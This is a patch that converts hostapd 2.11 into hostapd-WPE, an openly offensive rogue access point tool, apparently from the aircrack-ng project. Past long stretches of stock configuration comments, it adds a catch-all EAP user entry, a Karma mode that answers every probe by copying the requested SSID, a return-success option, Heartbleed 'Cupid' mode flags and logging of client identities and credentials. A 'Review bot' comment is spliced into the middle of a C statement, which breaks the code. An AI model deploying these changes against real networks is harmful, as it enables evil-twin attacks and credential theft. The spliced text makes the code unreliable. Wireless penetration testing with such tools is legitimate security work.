++#friendly_name=WPS Access Point
++
++# Manufacturer URL (optional for UPnP)
++#manufacturer_url=http://www.example.com/
++
++# Model Description (recommended for UPnP)
++# Long description for end user. Should be less than 128 characters.
++#model_description=Wireless Access Point
++
++# Model URL (optional for UPnP)
++#model_url=http://www.example.com/model/
++
++# Universal Product Code (optional for UPnP)
++# 12-digit, all-numeric code that identifies the consumer package.
++#upc=123456789012
++
++# WPS RF Bands (a = 5G, b = 2.4G, g = 2.4G, ag = dual band, ad = 60 GHz)
++# This value should be set according to RF band(s) supported by the AP if
++# hw_mode is not set. For dual band dual concurrent devices, this needs to be
++# set to ag to allow both RF bands to be advertized.
++#wps_rf_bands=ag
++
++# NFC password token for WPS
++# These parameters can be used to configure a fixed NFC password token for the
++# AP. This can be generated, e.g., with nfc_pw_token from wpa_supplicant. When
++# these parameters are used, the AP is assumed to be deployed with a NFC tag
++# that includes the matching NFC password token (e.g., written based on the
++# NDEF record from nfc_pw_token).
++#
++#wps_nfc_dev_pw_id: Device Password ID (16..65535)
++#wps_nfc_dh_pubkey: Hexdump of DH Public Key
++#wps_nfc_dh_privkey: Hexdump of DH Private Key
++#wps_nfc_dev_pw: Hexdump of Device Password
++
++##### Wi-Fi Direct (P2P) ######################################################
++
++# Enable P2P Device management
++#manage_p2p=1
++
++# Allow cross connection
++#allow_cross_connection=1
++
++#### TDLS (IEEE 802.11z-2010) #################################################
++
++# Prohibit use of TDLS in this BSS
++#tdls_prohibit=1
++
++# Prohibit use of TDLS Channel Switching in this BSS
++#tdls_prohibit_chan_switch=1
++
++##### IEEE 802.11v-2011 #######################################################
++
++# Time advertisement
++# 0 = disabled (default)
++# 2 = UTC time at which the TSF timer is 0
++#time_advertisement=2
++
++# Local time zone as specified in 8.3 of IEEE Std 1003.1-2004:
++# stdoffset[dst[offset][,start[/time],end[/time]]]
++#time_zone=EST5
++
++# WNM-Sleep Mode (extended sleep mode for stations)
++# 0 = disabled (default)
++# 1 = enabled (allow stations to use WNM-Sleep Mode)
++#wnm_sleep_mode=1
++
++# BSS Transition Management
++# 0 = disabled (default)
++# 1 = enabled
++#bss_transition=1
++
++# Proxy ARP
++# 0 = disabled (default)
++# 1 = enabled
++#proxy_arp=1
++
++# IPv6 Neighbor Advertisement multicast-to-unicast conversion
++# This can be used with Proxy ARP to allow multicast NAs to be forwarded to
++# associated STAs using link layer unicast delivery.
++# 0 = disabled (default)
++# 1 = enabled
++#na_mcast_to_ucast=0
++
++##### IEEE 802.11u-2011 #######################################################
++
++# Enable Interworking service
++#interworking=1
++
++# Access Network Type
++# 0 = Private network
++# 1 = Private network with guest access
++# 2 = Chargeable public network
++# 3 = Free public network
++# 4 = Personal device network
++# 5 = Emergency services only network
++# 14 = Test or experimental
++# 15 = Wildcard
++#access_network_type=0
++
++# Whether the network provides connectivity to the Internet
++# 0 = Unspecified
++# 1 = Network provides connectivity to the Internet
++#internet=1
++
++# Additional Step Required for Access
++# Note: This is only used with open network, i.e., ASRA shall ne set to 0 if
++# RSN is used.
++#asra=0
++
++# Emergency services reachable
++#esr=0
++
++# Unauthenticated emergency service accessible
++#uesa=0
++
++# Venue Info (optional)
++# The available values are defined in IEEE Std 802.11u-2011, 7.3.1.34.
++# Example values (group,type):
++# 0,0 = Unspecified
++# 1,7 = Convention Center
++# 1,13 = Coffee Shop
++# 2,0 = Unspecified Business
++# 7,1 Private Residence
++#venue_group=7
++#venue_type=1
++
++# Homogeneous ESS identifier (optional; dot11HESSID)
++# If set, this shall be identifical to one of the BSSIDs in the homogeneous
++# ESS and this shall be set to the same value across all BSSs in homogeneous
++# ESS.
++#hessid=02:03:04:05:06:07
++
++# Roaming Consortium List
++# Arbitrary number of Roaming Consortium OIs can be configured with each line
++# adding a new OI to the list. The first three entries are available through
++# Beacon and Probe Response frames. Any additional entry will be available only
++# through ANQP queries. Each OI is between 3 and 15 octets and is configured as
++# a hexstring.
++#roaming_consortium=021122
++#roaming_consortium=2233445566
++
++# Venue Name information
++# This parameter can be used to configure one or more Venue Name Duples for
++# Venue Name ANQP information. Each entry has a two or three character language
++# code (ISO-639) separated by colon from the venue name string.
++# Note that venue_group and venue_type have to be set for Venue Name
++# information to be complete.
++#venue_name=eng:Example venue
++#venue_name=fin:Esimerkkipaikka
++# Alternative format for language:value strings:
++# (double quoted string, printf-escaped string)
++#venue_name=P"eng:Example\nvenue"
++
++# Network Authentication Type
++# This parameter indicates what type of network authentication is used in the
++# network.
++# format: [redirect URL]
++# Network Authentication Type Indicator values:
++# 00 = Acceptance of terms and conditions
++# 01 = On-line enrollment supported
++# 02 = http/https redirection
++# 03 = DNS redirection
++#network_auth_type=00
++#network_auth_type=02http://www.example.com/redirect/me/here/
++
++# IP Address Type Availability
++# format: <1-octet encoded value as hex str>
++# (ipv4_type & 0x3f) << 2 | (ipv6_type & 0x3)
++# ipv4_type:
++# 0 = Address type not available
++# 1 = Public IPv4 address available
++# 2 = Port-restricted IPv4 address available
++# 3 = Single NATed private IPv4 address available
++# 4 = Double NATed private IPv4 address available
++# 5 = Port-restricted IPv4 address and single NATed IPv4 address available
++# 6 = Port-restricted IPv4 address and double NATed IPv4 address available
++# 7 = Availability of the address type is not known
++# ipv6_type:
++# 0 = Address type not available
++# 1 = Address type available
++# 2 = Availability of the address type not known
++#ipaddr_type_availability=14
++
++# Domain Name
++# format: [,]
++#domain_name=example.com,another.example.com,yet-another.example.com
++
++# 3GPP Cellular Network information
++# format: [;][;...]
++#anqp_3gpp_cell_net=244,91;310,026;234,56
++
++# NAI Realm information
++# One or more realm can be advertised. Each nai_realm line adds a new realm to
++# the set. These parameters provide information for stations using Interworking
++# network selection to allow automatic connection to a network based on
++# credentials.
++# format: ,[,][,][,...]
++# encoding:
++# 0 = Realm formatted in accordance with IETF RFC 4282
++# 1 = UTF-8 formatted character string that is not formatted in
++# accordance with IETF RFC 4282
++# NAI Realm(s): Semi-colon delimited NAI Realm(s)
++# EAP Method: [:<[AuthParam1:Val1]>][<[AuthParam2:Val2]>][...]
++# EAP Method types, see:
++# http://www.iana.org/assignments/eap-numbers/eap-numbers.xhtml#eap-numbers-4
++# AuthParam (Table 8-188 in IEEE Std 802.11-2012):
++# ID 2 = Non-EAP Inner Authentication Type
++# 1 = PAP, 2 = CHAP, 3 = MSCHAP, 4 = MSCHAPV2
++# ID 3 = Inner authentication EAP Method Type
++# ID 5 = Credential Type
++# 1 = SIM, 2 = USIM, 3 = NFC Secure Element, 4 = Hardware Token,
++# 5 = Softoken, 6 = Certificate, 7 = username/password, 9 = Anonymous,
++# 10 = Vendor Specific
++#nai_realm=0,example.com;example.net
++# EAP methods EAP-TLS with certificate and EAP-TTLS/MSCHAPv2 with
++# username/password
++#nai_realm=0,example.org,13[5:6],21[2:4][5:7]
++
++# Arbitrary ANQP-element configuration
++# Additional ANQP-elements with arbitrary values can be defined by specifying
++# their contents in raw format as a hexdump of the payload. Note that these
++# values will override ANQP-element contents that may have been specified in the
++# more higher layer configuration parameters listed above.
++# format: anqp_elem=: ++# For example, AP Geospatial Location ANQP-element with unknown location: ++#anqp_elem=265:0000 ++# For example, AP Civic Location ANQP-element with unknown location: ++#anqp_elem=266:000000 ++ ++# GAS Address 3 behavior ++# 0 = P2P specification (Address3 = AP BSSID) workaround enabled by default ++# based on GAS request Address3 ++# 1 = IEEE 802.11 standard compliant regardless of GAS request Address3 ++# 2 = Force non-compliant behavior (Address3 = AP BSSID for all cases) ++#gas_address3=0 ++ ++# QoS Map Set configuration ++# ++# Comma delimited QoS Map Set in decimal values ++# (see IEEE Std 802.11-2012, 8.4.2.97) ++# ++# format: ++# [,],... ++# ++# There can be up to 21 optional DSCP Exceptions which are pairs of DSCP Value ++# (0..63 or 255) and User Priority (0..7). This is followed by eight DSCP Range ++# descriptions with DSCP Low Value and DSCP High Value pairs (0..63 or 255) for ++# each UP starting from 0. If both low and high value are set to 255, the ++# corresponding UP is not used. ++# ++# default: not set ++#qos_map_set=53,2,22,6,8,15,0,7,255,255,16,31,32,39,255,255,40,47,255,255 ++ ++##### Hotspot 2.0 ############################################################# ++ ++# Enable Hotspot 2.0 support ++#hs20=1 ++ ++# Disable Downstream Group-Addressed Forwarding (DGAF) ++# This can be used to configure a network where no group-addressed frames are ++# allowed. The AP will not forward any group-address frames to the stations and ++# random GTKs are issued for each station to prevent associated stations from ++# forging such frames to other stations in the BSS. ++#disable_dgaf=1 ++ ++# OSU Server-Only Authenticated L2 Encryption Network ++#osen=1 ++ ++# ANQP Domain ID (0..65535) ++# An identifier for a set of APs in an ESS that share the same common ANQP ++# information. 0 = Some of the ANQP information is unique to this AP (default). 
++#anqp_domain_id=1234 ++ ++# Deauthentication request timeout ++# If the RADIUS server indicates that the station is not allowed to connect to ++# the BSS/ESS, the AP can allow the station some time to download a ++# notification page (URL included in the message). This parameter sets that ++# timeout in seconds. ++#hs20_deauth_req_timeout=60 ++ ++# Operator Friendly Name ++# This parameter can be used to configure one or more Operator Friendly Name ++# Duples. Each entry has a two or three character language code (ISO-639) ++# separated by colon from the operator friendly name string. ++#hs20_oper_friendly_name=eng:Example operator ++#hs20_oper_friendly_name=fin:Esimerkkioperaattori ++ ++# Connection Capability ++# This can be used to advertise what type of IP traffic can be sent through the ++# hotspot (e.g., due to firewall allowing/blocking protocols/ports). ++# format: :: ++# IP Protocol: 1 = ICMP, 6 = TCP, 17 = UDP ++# Port Number: 0..65535 ++# Status: 0 = Closed, 1 = Open, 2 = Unknown ++# Each hs20_conn_capab line is added to the list of advertised tuples. ++#hs20_conn_capab=1:0:2 ++#hs20_conn_capab=6:22:1 ++#hs20_conn_capab=17:5060:0 ++ ++# WAN Metrics ++# format: :
:
    :
    :
      : ++# WAN Info: B0-B1: Link Status, B2: Symmetric Link, B3: At Capabity ++# (encoded as two hex digits) ++# Link Status: 1 = Link up, 2 = Link down, 3 = Link in test state ++# Downlink Speed: Estimate of WAN backhaul link current downlink speed in kbps; ++# 1..4294967295; 0 = unknown ++# Uplink Speed: Estimate of WAN backhaul link current uplink speed in kbps ++# 1..4294967295; 0 = unknown ++# Downlink Load: Current load of downlink WAN connection (scaled to 255 = 100%) ++# Uplink Load: Current load of uplink WAN connection (scaled to 255 = 100%) ++# Load Measurement Duration: Duration for measuring downlink/uplink load in ++# tenths of a second (1..65535); 0 if load cannot be determined ++#hs20_wan_metrics=01:8000:1000:80:240:3000 ++ ++# Operating Class Indication ++# List of operating classes the BSSes in this ESS use. The Global operating ++# classes in Table E-4 of IEEE Std 802.11-2012 Annex E define the values that ++# can be used in this. ++# format: hexdump of operating class octets ++# for example, operating classes 81 (2.4 GHz channels 1-13) and 115 (5 GHz ++# channels 36-48): ++#hs20_operating_class=5173 ++ ++# OSU icons ++# ::::: ++#hs20_icon=32:32:eng:image/png:icon32:/tmp/icon32.png ++#hs20_icon=64:64:eng:image/png:icon64:/tmp/icon64.png ++ ++# OSU SSID (see ssid2 for format description) ++# This is the SSID used for all OSU connections to all the listed OSU Providers. ++#osu_ssid="example" ++ ++# OSU Providers ++# One or more sets of following parameter. Each OSU provider is started by the ++# mandatory osu_server_uri item. The other parameters add information for the ++# last added OSU provider. ++# ++#osu_server_uri=https://example.com/osu/ ++#osu_friendly_name=eng:Example operator ++#osu_friendly_name=fin:Esimerkkipalveluntarjoaja ++#osu_nai=anonymous@example.com ++#osu_method_list=1 0 ++#osu_icon=icon32 ++#osu_icon=icon64 ++#osu_service_desc=eng:Example services ++#osu_service_desc=fin:Esimerkkipalveluja ++# ++#osu_server_uri=... 
++ ++##### Fast Session Transfer (FST) support ##################################### ++# ++# The options in this section are only available when the build configuration ++# option CONFIG_FST is set while compiling hostapd. They allow this interface ++# to be a part of FST setup. ++# ++# FST is the transfer of a session from a channel to another channel, in the ++# same or different frequency bands. ++# ++# For detals, see IEEE Std 802.11ad-2012. ++ ++# Identifier of an FST Group the interface belongs to. ++#fst_group_id=bond0 ++ ++# Interface priority within the FST Group. ++# Announcing a higher priority for an interface means declaring it more ++# preferable for FST switch. ++# fst_priority is in 1..255 range with 1 being the lowest priority. ++#fst_priority=100 ++ ++# Default LLT value for this interface in milliseconds. The value used in case ++# no value provided during session setup. Default is 50 ms. ++# fst_llt is in 1..4294967 range (due to spec limitation, see 10.32.2.2 ++# Transitioning between states). ++#fst_llt=100 ++ ++##### Radio measurements / location ########################################### ++ ++# The content of a LCI measurement subelement ++#lci= ++ ++# The content of a location civic measurement subelement ++#civic= ++ ++# Enable neighbor report via radio measurements ++#rrm_neighbor_report=1 ++ ++# Publish fine timing measurement (FTM) responder functionality ++# This parameter only controls publishing via Extended Capabilities element. ++# Actual functionality is managed outside hostapd. ++#ftm_responder=0 ++ ++# Publish fine timing measurement (FTM) initiator functionality ++# This parameter only controls publishing via Extended Capabilities element. ++# Actual functionality is managed outside hostapd. 
++#ftm_initiator=0 ++ ++##### TESTING OPTIONS ######################################################### ++# ++# The options in this section are only available when the build configuration ++# option CONFIG_TESTING_OPTIONS is set while compiling hostapd. They allow ++# testing some scenarios that are otherwise difficult to reproduce. ++# ++# Ignore probe requests sent to hostapd with the given probability, must be a ++# floating point number in the range [0, 1). ++#ignore_probe_probability=0.0 ++# ++# Ignore authentication frames with the given probability ++#ignore_auth_probability=0.0 ++# ++# Ignore association requests with the given probability ++#ignore_assoc_probability=0.0 ++# ++# Ignore reassociation requests with the given probability ++#ignore_reassoc_probability=0.0 ++# ++# Corrupt Key MIC in GTK rekey EAPOL-Key frames with the given probability ++#corrupt_gtk_rekey_mic_probability=0.0 ++# ++# Include only ECSA IE without CSA IE where possible ++# (channel switch operating class is needed) ++#ecsa_ie_only=0 ++ ++##### Multiple BSSID support ################################################## ++# ++# Above configuration is using the default interface (wlan#, or multi-SSID VLAN ++# interfaces). Other BSSIDs can be added by using separator 'bss' with ++# default interface name to be allocated for the data packets of the new BSS. ++# ++# hostapd will generate BSSID mask based on the BSSIDs that are ++# configured. hostapd will verify that dev_addr & MASK == dev_addr. If this is ++# not the case, the MAC address of the radio must be changed before starting ++# hostapd (ifconfig wlan0 hw ether ). If a BSSID is configured for ++# every secondary BSS, this limitation is not applied at hostapd and other ++# masks may be used if the driver supports them (e.g., swap the locally ++# administered bit) ++# ++# BSSIDs are assigned in order to each BSS, unless an explicit BSSID is ++# specified using the 'bssid' parameter. 
++# If an explicit BSSID is specified, it must be chosen such that it: ++# - results in a valid MASK that covers it and the dev_addr ++# - is not the same as the MAC address of the radio ++# - is not the same as any other explicitly specified BSSID ++# ++# Alternatively, the 'use_driver_iface_addr' parameter can be used to request ++# hostapd to use the driver auto-generated interface address (e.g., to use the ++# exact MAC addresses allocated to the device). ++# ++# Not all drivers support multiple BSSes. The exact mechanism for determining ++# the driver capabilities is driver specific. With the current (i.e., a recent ++# kernel) drivers using nl80211, this information can be checked with "iw list" ++# (search for "valid interface combinations"). ++# ++# Please note that hostapd uses some of the values configured for the first BSS ++# as the defaults for the following BSSes. However, it is recommended that all ++# BSSes include explicit configuration of all relevant configuration items. ++# ++#bss=wlan0_0 ++#ssid=test2 ++# most of the above items can be used here (apart from radio interface specific ++# items, like channel) ++ ++#bss=wlan0_1 ++#bssid=00:13:10:95:fe:0b ++# ... +diff '--color=auto' -rupN hostapd-2.11/hostapd/hostapd-wpe.eap_user hostapd-2.11-wpe/hostapd/hostapd-wpe.eap_user +--- hostapd-2.11/hostapd/hostapd-wpe.eap_user 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/hostapd-wpe.eap_user 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,107 @@ ++# hostapd user database for integrated EAP server ++ ++# Each line must contain an identity, EAP method(s), and an optional password ++# separated with whitespace (space or tab). The identity and password must be ++# double quoted ("user"). Password can alternatively be stored as ++# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password ++# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. 
This means ++# that the plaintext password does not need to be included in the user file. ++# Password hash is stored as hash:<16-octets of hex data> without quotation ++# marks. ++ ++# [2] flag in the end of the line can be used to mark users for tunneled phase ++# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous ++# identity can be used in the unencrypted phase 1 and the real user identity ++# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous ++# access is needed, two user entries is needed, one for phase 1 and another ++# with the same username for phase 2. ++# ++# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use ++# password option. ++# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a ++# password. ++# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration. ++# ++# * can be used as a wildcard to match any user identity. The main purposes for ++# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to ++# avoid having to configure every certificate for EAP-TLS authentication. The ++# first matching entry is selected, so * should be used as the last phase 1 ++# user entry. ++# ++# "prefix"* can be used to match the given prefix and anything after this. The ++# main purpose for this is to be able to avoid EAP method negotiation when the ++# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This ++# is only allowed for phase 1 identities. ++# ++# Multiple methods can be configured to make the authenticator try them one by ++# one until the peer accepts one. The method names are separated with a ++# comma (,). ++# ++# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP ++# version based on the Phase 1 identity. Without this flag, the EAP ++# authenticator advertises the highest supported version and select the version ++# based on the first PEAP packet from the supplicant. 
++# ++# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel. ++# Tunneled EAP methods are configured with standard EAP method name and [2] ++# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP, ++# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a ++# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password ++# hash. ++# ++# Arbitrary RADIUS attributes can be added into Access-Accept packets similarly ++# to the way radius_auth_req_attr is used for Access-Request packet in ++# hostapd.conf. For EAP server, this is configured separately for each user ++# entry with radius_accept_attr= line(s) following the main user entry ++# line. ++ ++# Phase 1 users ++#"user" MD5 "password" ++#"test user" MD5 "secret" ++#"example user" TLS ++#"DOMAIN\user" MSCHAPV2 "password" ++#"gtc user" GTC "password" ++#"pax user" PAX "unknown" ++#"pax.user@example.com" PAX 0123456789abcdef0123456789abcdef ++#"psk user" PSK "unknown" ++#"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef ++#"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef ++#"ttls" TTLS ++#"not anonymous" PEAP ++# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes ++#"0"* AKA,TTLS,TLS,PEAP,SIM ++#"1"* SIM,TTLS,TLS,PEAP,AKA ++#"2"* AKA,TTLS,TLS,PEAP,SIM ++#"3"* SIM,TTLS,TLS,PEAP,AKA ++#"4"* AKA,TTLS,TLS,PEAP,SIM ++#"5"* SIM,TTLS,TLS,PEAP,AKA ++#"6"* AKA' ++#"7"* AKA' ++#"8"* AKA' ++ ++# Wildcard for all other identities ++#* PEAP,TTLS,TLS,SIM,AKA ++ ++# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users ++#"t-md5" MD5 "password" [2] ++#"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2] ++#"t-gtc" GTC "password" [2] ++#"not anonymous" MSCHAPV2 "password" [2] ++#"user" MD5,GTC,MSCHAPV2 "password" [2] ++#"test user" MSCHAPV2 hash:000102030405060708090a0b0c0d0e0f [2] ++#"ttls-user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2 "password" [2] ++ ++# Default to EAP-SIM and EAP-AKA based on 
fixed identity prefixes in phase 2
++#"0"* AKA [2]
++#"1"* SIM [2]
++#"2"* AKA [2]
++#"3"* SIM [2]
++#"4"* AKA [2]
++#"5"* SIM [2]
++#"6"* AKA' [2]
++#"7"* AKA' [2]
++#"8"* AKA' [2]
++
++# WPE - DO NOT REMOVE - These entries are specifically in here
++* PEAP,TTLS,TLS,FAST
++"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2]
+diff '--color=auto' -rupN hostapd-2.11/hostapd/main.c hostapd-2.11-wpe/hostapd/main.c
+--- hostapd-2.11/hostapd/main.c 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/hostapd/main.c 2024-07-26 12:24:18.700000000 +0000
+@@ -31,7 +31,7 @@
+ #include "config_file.h"
+ #include "eap_register.h"
+ #include "ctrl_iface.h"
+-
++#include "wpe/wpe.h"
+ 
+ struct hapd_global {
+ void **drv_priv;
+@@ -552,11 +552,17 @@ static int hostapd_global_run(struct hap
+ static void show_version(void)
+ {
+ fprintf(stderr,
+- "hostapd v%s\n"
++ "hostapd-WPE v%s\n"
+ "User space daemon for IEEE 802.11 AP management,\n"
+ "IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
+ "Copyright (c) 2002-2024, Jouni Malinen "
+- "and contributors\n",
++ "and contributors\n"
++ "-----------------------------------------------------\n"
++ "WPE (Wireless Pwnage Edition)\n"
++ "This version has been cleverly modified to target\n"
++ "wired and wireless users.\n"
++ "Twitter: @aircrackng\n"
++ "Website: https://aircrack-ng.org\n",
+ VERSION_STR);
+ }
+ 
+@@ -566,7 +572,7 @@ static void usage(void)
+ show_version();
+ fprintf(stderr,
+ "\n"
+- "usage: hostapd [-hdBKtvq] [-P ] [-e ] "
++ "usage: hostapd-wpe [-hdBKtvrkc] [-P ] [-e ] "
+ "\\\n"
+ " [-g ] [-G ]\\\n"
+ " [-i ]\\\n"
+@@ -595,7 +601,16 @@ static void usage(void)
+ " -S start all the interfaces synchronously\n"
+ " -t include timestamps in some debug messages\n"
+ " -v show hostapd version\n"
+- " -q show less debug messages (-qq for even less)\n");
++ " -q show less debug messages (-qq for even less)\n"
++ "\n\n"
++ "WPE options:\n"
++ " -r Return Success where possible\n"
++#if 
OPENSSL_VERSION_NUMBER < 0x10100000L
++ " -c Cupid Mode (Heartbleed clients)\n\n"
++#endif
++ " -k Karma Mode (Respond to all probes)\n"
++ "\n"
++ " Note: credentials logging is always enabled\n\n");
+ 
+ exit(1);
+ }
+@@ -809,7 +824,7 @@ int main(int argc, char *argv[])
+ #endif /* CONFIG_DPP */
+ 
+ for (;;) {
+- c = getopt(argc, argv, "b:Bde:f:hi:KP:sSTtu:vg:G:q");
++ c = getopt(argc, argv, "b:Bde:f:hi:KP:sSTtu:vg:G:qrkc");
+ if (c < 0)
+ break;
+ switch (c) {
+@@ -877,6 +892,15 @@ int main(int argc, char *argv[])
+ case 'u':
+ return gen_uuid(optarg);
+ #endif /* CONFIG_WPS */
++ case 'k':
++ wpe_conf.wpe_enable_karma++;
++ break;
++ case 'c':
++ wpe_conf.wpe_enable_cupid++;
++ break;
++ case 'r':
++ wpe_conf.wpe_enable_return_success++;
++ break;
+ case 'i':
+ if (hostapd_get_interface_names(&if_names,
+ &if_names_size, optarg))
+diff '--color=auto' -rupN hostapd-2.11/src/Makefile hostapd-2.11-wpe/src/Makefile
+--- hostapd-2.11/src/Makefile 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/src/Makefile 2024-07-26 12:29:11.820000000 +0000
+@@ -1,5 +1,5 @@
+ SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae pasn radius rsn_supp tls utils wps
+-SUBDIRS += fst
++SUBDIRS += fst wpe
+ 
+ all:
+ for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
+diff '--color=auto' -rupN hostapd-2.11/src/ap/beacon.c hostapd-2.11-wpe/src/ap/beacon.c
+--- hostapd-2.11/src/ap/beacon.c 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/src/ap/beacon.c 2024-07-26 09:11:33.200000000 +0000
+@@ -33,7 +33,7 @@
+ #include "dfs.h"
+ #include "taxonomy.h"
+ #include "ieee802_11_auth.h"
+-
++#include "wpe/wpe.h"
+ 
+ #ifdef NEED_AP_MLME
+ 
+@@ -1480,6 +1480,13 @@ void handle_probe_req(struct hostapd_dat
+ }
+ #endif /* CONFIG_TAXONOMY */
+ 
++ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
++ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), 
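Review bot: The option summary and the option letters no longer agree: the synopsis `[-hdBKtvrkc]` in the `@@ -566,7 +572,7 @@` hunk drops `q` although `-q` keeps its help line and remains in the getopt string, and it lists `c` unconditionally although the `-c` help line in the `@@ -595,7 +601,16 @@` hunk sits under `#if OPENSSL_VERSION_NUMBER < 0x10100000L` while the getopt string and the `case 'c':` branch are not guarded, so with a newer OpenSSL the flag is accepted but documented nowhere. The synopsis should read `[-hdBKtvqrkc]`, and either the getopt letter and the `case 'c':` branch should carry the same `#if` guard as the help line, or the help line should be unconditional and state that `-c` has no effect with OpenSSL 1.1 or later. usage() and main() both start outside these hunks.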
wpa_ssid_txt(elems.ssid, elems.ssid_len));
++ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
++ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
++ hapd->conf->ssid.ssid_len = elems.ssid_len;
++ }
++
+ res = ssid_match(hapd, elems.ssid, elems.ssid_len,
+ elems.ssid_list, elems.ssid_list_len,
+ elems.short_ssid_list, elems.short_ssid_list_len);
+diff '--color=auto' -rupN hostapd-2.11/src/ap/ieee802_11.c hostapd-2.11-wpe/src/ap/ieee802_11.c
+--- hostapd-2.11/src/ap/ieee802_11.c 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/src/ap/ieee802_11.c 2024-07-26 12:25:41.092000000 +0000
+@@ -58,7 +58,7 @@
+ #include "comeback_token.h"
+ #include "nan_usd_ap.h"
+ #include "pasn/pasn_common.h"
+-
++#include "wpe/wpe.h"
+ 
+ #ifdef CONFIG_FILS
+ static struct wpabuf *
+@@ -3438,8 +3438,8 @@ static u16 check_ssid(struct hostapd_dat
+ if (ssid_ie == NULL)
+ return WLAN_STATUS_UNSPECIFIED_FAILURE;
+ 
+- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
++ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
++ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
+ hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
+ HOSTAPD_LEVEL_INFO,
+ "Station tried to associate with unknown SSID "
+diff '--color=auto' -rupN hostapd-2.11/src/ap/ieee802_1x.c hostapd-2.11-wpe/src/ap/ieee802_1x.c
+--- hostapd-2.11/src/ap/ieee802_1x.c 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/src/ap/ieee802_1x.c 2024-07-26 09:11:33.204000000 +0000
+@@ -923,6 +923,8 @@ static void handle_eap_response(struct h
+ {
+ u8 type, *data;
+ struct eapol_state_machine *sm = sta->eapol_sm;
++ const u8 *identity;
++ size_t identity_len;
+ 
+ if (!sm)
+ return;
+@@ -942,6 +944,16 @@ static void handle_eap_response(struct h
+ eap->code, eap->identifier, be_to_host16(eap->length),
+ eap_server_get_name(0, type), type);
+ 
++/* Print Response-Identity from STA*/
++ identity = 
eap_get_identity(sm->eap, &identity_len); ++ os_free(sm->identity); ++ sm->identity = (u8 *) dup_binstr(identity, identity_len); ++ sm->identity_len = identity_len; ++ if (identity != NULL) { ++ hostapd_logger(hapd, sm->addr, HOSTAPD_MODULE_IEEE8021X, ++ HOSTAPD_LEVEL_INFO, "Identity received from STA: '%s'", sm->identity); ++ } ++ + sm->dot1xAuthEapolRespFramesRx++; + + wpabuf_free(sm->eap_if->eapRespData); +diff '--color=auto' -rupN hostapd-2.11/src/crypto/ms_funcs.h hostapd-2.11-wpe/src/crypto/ms_funcs.h +--- hostapd-2.11/src/crypto/ms_funcs.h 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/crypto/ms_funcs.h 2024-07-26 09:11:33.204000000 +0000 +@@ -9,6 +9,10 @@ + #ifndef MS_FUNCS_H + #define MS_FUNCS_H + ++int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge, ++ const u8 *username, size_t username_len, ++ u8 *challenge); ++ + int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge, + const u8 *username, size_t username_len, + const u8 *password, size_t password_len, +diff '--color=auto' -rupN hostapd-2.11/src/crypto/tls_openssl.c hostapd-2.11-wpe/src/crypto/tls_openssl.c +--- hostapd-2.11/src/crypto/tls_openssl.c 2024-07-26 12:31:12.300000000 +0000 ++++ hostapd-2.11-wpe/src/crypto/tls_openssl.c 2024-07-26 12:33:34.152000000 +0000 +@@ -29,7 +29,6 @@ + #include + #include + #include +-#include + #if OPENSSL_VERSION_NUMBER >= 0x30000000L + #include + #include +@@ -50,6 +49,7 @@ + #include "sha256.h" + #include "tls.h" + #include "tls_openssl.h" ++#include "wpe/wpe.h" + + #if !defined(CONFIG_FIPS) && \ + (defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \ +@@ -205,6 +205,10 @@ static int tls_add_ca_from_keystore_enco + + #endif /* ANDROID */ + ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ + static int 